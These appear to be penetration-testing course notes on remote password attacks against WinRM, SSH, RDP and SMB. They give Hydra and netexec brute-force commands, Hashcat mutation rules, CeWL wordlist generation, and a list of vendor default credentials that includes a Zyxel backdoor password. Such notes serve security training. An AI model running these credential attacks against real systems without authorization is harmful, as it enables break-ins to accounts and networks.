Remote Password Attacks

Common Network Services Overview

Network services frequently targeted during penetration testing include:

  • Authentication services (SSH, RDP, WinRM)

  • File sharing services (FTP, SMB, NFS)

  • Email services (IMAP/POP3, SMTP)

  • Database services (MySQL/MSSQL)

  • Directory services (LDAP)

Attack Methodologies & Tools

Windows Remote Management (WinRM)

  • Protocol Details:

    • Uses WS-Management (SOAP-based XML)

    • Ports: TCP 5985 (HTTP), 5986 (HTTPS)

    • Requires manual activation on Windows 10+

Netexec (formerly CrackMapExec)

# Installation
sudo apt-get -y install crackmapexec

# Basic Usage
netexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>

# Example
netexec winrm 10.129.42.197 -u user.list -p password.list

Evil-WinRM

# Installation
sudo gem install evil-winrm

# Usage
evil-winrm -i <target-IP> -u <username> -p <password>

Secure Shell (SSH)

  • Details:

    • Default Port: TCP 22

    • Uses multiple encryption methods:

      • Symmetric (shared key)

      • Asymmetric (private/public keys)

      • Hashing for message authenticity

# Brute force with Hydra
hydra -L user.list -P password.list ssh://<target-IP>

# Standard connection
ssh <user>@<target-IP>

Remote Desktop Protocol (RDP)

  • Details:

    • Default Port: TCP 3389

    • Provides GUI remote access to Windows systems

# Brute force with Hydra
hydra -L user.list -P password.list rdp://<target-IP>

# Connect with xFreeRDP
xfreerdp /v:<target-IP> /u:<username> /p:<password>

Server Message Block (SMB)

  • Details:

    • Ports: TCP 139, 445

    • Used for file and printer sharing

    • Open-source version: Samba

# Brute force with Hydra
hydra -L user.list -P password.list smb://<target-IP>

# Using Metasploit
use auxiliary/scanner/smb/smb_login

# List shares with netexec
netexec smb $ip -u "$user" -p "$password" --shares

# Connect to shares with smbclient
smbclient -U "$user" \\\\$ip\\$SHARE

Password Mutation Techniques

Using Hashcat Rules

  • Basic rule syntax:

    • : → Do nothing

    • l → Convert to lowercase

    • u → Convert to uppercase

    • c → Capitalize first letter

    • sXY → Replace all X with Y

    • $! → Add ! to end

# Example custom rule file (custom.rule)
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

# Generate mutations
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

CeWL for Custom Wordlists

# Basic syntax
cewl <URL> -d <depth> -m <min_word_length> --lowercase -w <output_file>

# Example
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist

Credential Stuffing Attacks

Default Credentials

  • Common examples:

    Zyxel (ssh):        zyfwp:PrOw!aN_fXp
APC UPS (web):      apc:apc
Weblogic (web):     system:manager
Kali Linux (OS):    kali:kali
D-Link (web):       admin:admin

Using Hydra for Credential Stuffing

# Basic syntax
hydra -C <user_pass.list> <protocol>://<IP>

# Example
hydra -C default_creds.list ssh://10.129.42.197

Best Practices & Tools Summary

Key Tools

  • Netexec: Multi-protocol pentesting

  • Evil-WinRM: WinRM interaction

  • Hydra: Multi-protocol password brute-forcing

  • xFreeRDP: RDP client

  • Hashcat: Password mutation

  • CeWL: Custom wordlist generation

OSINT Considerations

  • Research target organization for:

    • Naming conventions

    • Common applications

    • Default credentials

    • Password policies

    • Breached credentials

Attack Workflow

  1. Gather target information and credentials

  2. Generate custom wordlists using CeWL

  3. Create mutations using Hashcat rules

  4. Attempt credential stuffing with default passwords

  5. Use appropriate tool based on service (Hydra, Netexec, etc.)

PreviousPassword AttacksNextWindows Local Password Attacks